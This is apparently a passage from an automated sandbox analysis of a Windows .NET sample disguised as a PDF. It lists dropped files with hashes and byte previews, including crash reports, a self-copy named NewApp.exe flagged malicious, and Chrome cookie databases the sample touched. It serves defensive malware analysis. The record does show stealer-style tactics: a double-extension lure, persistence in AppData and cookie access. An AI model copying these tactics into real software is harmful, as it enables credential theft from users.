                                                    SSDEEP:192:uOqHtvimHBUZMXCaPceny+f//u7sQS274ItqyJ:+rBUZMXCaZ1X/u7sQX4ItHJ
                                                    MD5:E421DD977C9ACCD76C60ECB8AE32A548
                                                    SHA1:E3B3C3998B92175B4763727A9513CEFE834F0BF0
                                                    SHA-256:CEC02A18EDFD7B055CE595791181671353807F5E29DA76F5D0AFD79D8E57374C
                                                    SHA-512:AC42799DDFA745990EE3517B5CFF365B884252AC40CEC095694C98C0A895AA99A517CFE0B46EF7B3362C676ADF854B7A1543C4CE2A886D3CF3923D36EB56D013
                                                    Malicious:false
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.3.6.8.5.9.4.2.7.2.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.3.7.0.5.4.4.2.6.7.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.c.0.1.d.2.f.-.4.c.5.3.-.4.8.2.7.-.a.b.c.f.-.8.6.3.0.b.1.0.e.8.4.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.9.a.f.c.0.d.-.2.8.d.6.-.4.d.e.f.-.9.6.d.9.-.6.4.b.0.6.c.7.8.f.6.3.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.c.0.-.0.0.0.1.-.0.0.1.b.-.5.8.5.f.-.6.a.8.b.c.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.e.0.3.c.b.3.0.e.b.2.1.8.b.9.a.5.4.7.2.a.9.2.d.5.6.5.3.4.5.5.0.0.0.0.0.9.0.4.!.0.0.0.0.b.5.2.d.9.b.a.9.b.7.8.9.0.e.2.b.5.1.e.6.4.a.b.8.8.9.8.0.5.c.f.c.e.5.1.2.6.e.b.b.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_2b4ac1a517da4509e55ae841ecc74477b428236_b4418cc1_10572409\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16034
                                                    Entropy (8bit):3.764375690354279
                                                    Encrypted:false
                                                    SSDEEP:192:XL0YuimHBUZMXCaKsUAeZiN/u7sQS274ItqyP:7LCBUZMXCalmW/u7sQX4ItHP
                                                    MD5:F1769CA11F15309841F7E4376B3D580C
                                                    SHA1:87103B768A82086FE79CC5BCFC8D23C32264C657
                                                    SHA-256:AD7B69EC995F5DA2E4EC465AEC239090C7EA678B5EDD017DDC2C29337E4D2D34
                                                    SHA-512:CE593B4F1D729A46BFE4370CFC22BF5115BCF5C53CB11487C07FA8E4FF98067536BBA6B4572A7E3D9DFE0FD7DCEE38A862E22ADB35B0BC81BAD0D6D037799D8B
                                                    Malicious:false
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.3.6.7.4.0.5.2.1.4.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.3.6.9.4.5.0.5.2.3.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.f.2.0.8.8.3.-.e.5.4.3.-.4.9.4.1.-.b.e.8.6.-.f.b.5.0.1.5.d.4.a.a.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.f.b.1.8.3.8.-.a.4.e.c.-.4.c.b.8.-.a.c.1.1.-.1.5.a.e.4.4.c.3.d.4.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.2.c.-.0.0.0.1.-.0.0.1.b.-.f.d.0.6.-.7.5.8.6.c.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.e.0.3.c.b.3.0.e.b.2.1.8.b.9.a.5.4.7.2.a.9.2.d.5.6.5.3.4.5.5.0.0.0.0.0.9.0.4.!.0.0.0.0.b.5.2.d.9.b.a.9.b.7.8.9.0.e.2.b.5.1.e.6.4.a.b.8.8.9.8.0.5.c.f.c.e.5.1.2.6.e.b.b.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B46.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 08:47:58 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):302765
                                                    Entropy (8bit):3.7501461495282693
                                                    Encrypted:false
                                                    SSDEEP:3072:KXyGRBu0+jd+p8CdB2o+L9gIOgF5mvFLw0iUCgU+9hyzSXrZoS2n2:6RM07pMBL9RpD/JTjkZoI
                                                    MD5:A000F0418C09C6DFE2FA8CF3E45806AE
                                                    SHA1:173CFFD2421C0902FD15813E97FD1A559314430A
                                                    SHA-256:4BA5851D7F7F834D196899BA2A2405C8C0275430D64232403A7235F8710DF294
                                                    SHA-512:7C5B259F338A8E6C55885DAE7F1E53B73421C6C8475E4D6D2B9BB79FD952F3A72794795EED59C4E14ADF6E1B4BD152B91D7A6CAA185E111655BE8A85BFC2442C
                                                    Malicious:false
                                                    Preview: MDMP....... .......>.4`...................U...........B...... ,......GenuineIntelW...........T.......,...$.4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER94AB.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8392
                                                    Entropy (8bit):3.6919325540904246
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNi1A686YrUSUJF/3kgmfZ/SL+prf89bdEsf34/m:RrlsNiC686YoSUJFPkgmfxSfd3f3d
                                                    MD5:69D24C0DE770F1FBB89CF14B4CAD61FF
                                                    SHA1:386E6660CEED0015ADB616857717E69F349EF88C
                                                    SHA-256:C79E1F4339A7688879EC2C74C2DE5ABF36510C0AF0D63559F260D4399FEC13A7
                                                    SHA-512:A3632935FD493BAC148B09AE88EFFC7381C14490309F36724CA244D46AECE3CB9A584D01C561114735DDCEAB01228F5C6C7FBFF4E008D0D578F655556D7F9A07
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.9.2.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D76.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4668
                                                    Entropy (8bit):4.45014383346403
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsIJgtWI9kCWSC8BtrM8fm8M4JVFF1+q8v4ikuTnLk1d:uITfObDSNTxJ/KRkuTLk1d
                                                    MD5:1B069735485FAE6626BDB82BE56ECE84
                                                    SHA1:08C0D850CB9E91C6511A857B54DCA94B2E6A44A4
                                                    SHA-256:059DFE19594F15D04DFB9335C5528B675C7290D5A9404EB76798FDE4085821CF
                                                    SHA-512:FCA541047B5EA5F856FADE8FDE7C37D2A3E1D1079B65E7C6CAD44B2F98A5051ABF4F5A9FC760880064742E31A5539404D27E96ECC2BE1D327778A4FA9C7C5B83
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9B8.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:48:14 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):193940
                                                    Entropy (8bit):4.448803965702104
                                                    Encrypted:false
                                                    SSDEEP:3072:djiqj0AQJjd+pAzVaoSw9gIOgF5k0fUCgU7+5yj99zeC5:djic0v+pV/w9RpDk8Tji5mzp
                                                    MD5:E37220F5970C6AFAF37DDA42C9D32F79
                                                    SHA1:B3AFC7A3E37520DE2E5AA950631733216D7889C9
                                                    SHA-256:D6F1C84EF77F6E74B8942ED601F08ACECE24628CB9A33C4945B365AB73319BEC
                                                    SHA-512:66E0B129DD2F411AE30BBDC18FE5D57C19C7FBAFF82245E75F5706D7328E8F345FB589F519ABF0AE5825B44F60551AD96F9AD15028E9DB258EBCA3A66D3FB47C
                                                    Malicious:false
                                                    Preview: MDMP....... .......N.4`...................U...........B......D)......GenuineIntelW...........T...........,.4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD95.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 08:47:05 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):302765
                                                    Entropy (8bit):3.7370014275285786
                                                    Encrypted:false
                                                    SSDEEP:3072:08NFHoh0mS22jd+pYZbgdb9gIOgF5+x0QUCgUHtIaxFkoXh5zz:Rw0d2jpl9RpDCnTjVksP
                                                    MD5:EB89E5B3A234F9D666675CB4AECC16B4
                                                    SHA1:78EBFD8D672BB0036ADB41FDA3B2BE02898842FF
                                                    SHA-256:D2490217E8D12838ED35333A463C50E88AD204414D5E683702B985B2484024AA
                                                    SHA-512:4B3AF4757FE7FCA9E9BC65821D85B64AB489384206A3C7D8FD966149E7CD470BCF20B9DB0EEDCA1FFBCFB735BB5144ECCE614152466D4F9BFB7EF325346AAE54
                                                    Malicious:false
                                                    Preview: MDMP....... .........4`...................U...........B...... ,......GenuineIntelW...........T.............4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC218.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8472
                                                    Entropy (8bit):3.699376109781331
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiYp62h6YrzSUtjLgmfZ0SL+prz89btVsfxPm:RrlsNiO646YPSUtPgmfWSLtufE
                                                    MD5:D92949B08F55869B3317AB94B544C183
                                                    SHA1:3B03ED0D7E54A111D823C5834250C5B40F1C36C7
                                                    SHA-256:98F5474FE1DDCA8BE13E38FD95106E4BFD95024947D23901F1FF8F7DE8E68D17
                                                    SHA-512:64026B7D192950D2CBE9658BB0FAF6814F77278DD22EC158C71CBCF52EF89AB34FD119CA4D8104416ADE6A7F2EA416E9B6CB7D8F68FF743D1B5FB9D2FF8A6319
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.0.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4C9.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4775
                                                    Entropy (8bit):4.506028890634219
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsVJgtWI9kCWSC8BtCS8fm8M4JlJTFFa+q8vrT6NpkuTCbLHbOdd:uITfvbDSNEJlJ+KrenkuubLHbCd
                                                    MD5:14D89A4A3620137B9570FE2102ECC093
                                                    SHA1:A18E9CA9454AD6C9FEC3C783F3CD0392E98BB96E
                                                    SHA-256:61A04ADCC9BE1678AC749298DB86EDD21A072E5EE80E812D76D1D57B687A9798
                                                    SHA-512:785FC0EE3FC0956D469D533D7F096B577C0C751E665F13CA10217E0B0289517CA43A9BC24CED504F669DC0BB3586361DE07B6D74D2BE4E47C8F74A15181868AC
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873717" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0F8.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8390
                                                    Entropy (8bit):3.693070169571263
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiIJ6z/6Yr4SUgoigmfZ/SL+prZ89bTIsfFRm:RrlsNi+6r6YESUgoigmfxSZT7fa
                                                    MD5:003FE21C083309777FEE70C441DE512E
                                                    SHA1:481527269D291C16D572DEBB12DA8A806B1CB6D5
                                                    SHA-256:1105C2A4B7A2AC515D456C90FB2FEA56F51D745BAE44C3016056473F0CB212DE
                                                    SHA-512:D221B22BB58C939089B41B804040F4EFFAC73EF467BE74ECCB1CA7CB15A97D761295D2574C40919D236CB705B6B32ACE63CCB930B689E80C03C68FCD5EC33F79
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.1.6.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD510.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4668
                                                    Entropy (8bit):4.451093760155469
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsIJgtWI9kCWSC8Btj58fm8M4JVFFv+q8v4xkuTnLkEd:uITfObDSNr+JtKikuTLkEd
                                                    MD5:7B70D12BC87F48C2F4A7BF6AC2385298
                                                    SHA1:87E126B5D2A5DD8959F3B5EA8AF072D86A0604C3
                                                    SHA-256:D99021C388E63AB7F95DAC191F48ED36D0D31C681E926EEDB79E5D3093B33AEF
                                                    SHA-512:137880ED9E01DA92C0C5AEF38B53D8D78798F55ED96CA4D652864CB4B18D8AAF05327777B3EC6E1E8E1392B06F7C9D0B401533F4F19A0C582787F61D4DF6C2F1
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\Users\user\AppData\Roaming\3pg5upzt.i5q\Chrome\Default\Cookies
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:modified
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.7006690334145785
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                    Malicious:false
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):20616
                                                    Entropy (8bit):6.63827426459457
                                                    Encrypted:false
                                                    SSDEEP:384:Mhwp6WjOxO7CLlbMq/JYogNGqQsKNAdAfpniHRlhFk:gSSbhxJFqtPAfpniHbh6
                                                    MD5:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    SHA1:B52D9BA9B7890E2B51E64AB889805CFCE5126EBB
                                                    SHA-256:B37D450B7D60FD2497AE794E9835B999339549406B1A05D92BB46A9F1A23EB12
                                                    SHA-512:69D91B22E3718AFA7CE31EEA7C474EA6E8862C114186C832CF0BB9C8E1CCE19B17275D01DC025DA9D98E58A08265E6BF22F8084A010C06B840C4AD123FC1375C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..0...........N... ...`....@.. ...............................y....@.................................<N..O....`...............8............................................................... ............... ..H............text........ ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............6..............@..B................pN......H........'...&...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0............(......(......(.....s......(......~....o..........%.r...pr...p~-...o!...(.....o.......+F+...&.........o...........,%..(......(......(.......(.....o.........X....i2..(...........%..o.......+...*..0...........s.....*.0..M..............%.r...pri..p~-...o!....%.rm..pr...p~-...o!.....s.....+...'.....o.....*....0............(.....r...pr..
                                                    C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                    C:\Users\user\AppData\Roaming\aldkfvcd.2z0\Chrome\Default\Cookies
                                                    Process:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.7006690334145785
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                    Malicious:false
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.63827426459457
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:A4-058000200390-10-14_REV_pdf.exe
                                                    File size:20616
                                                    MD5:5af8f94a752ca9996fbfbf01dcc30edd
                                                    SHA1:b52d9ba9b7890e2b51e64ab889805cfce5126ebb
                                                    SHA256:b37d450b7d60fd2497ae794e9835b999339549406b1a05d92bb46a9f1a23eb12
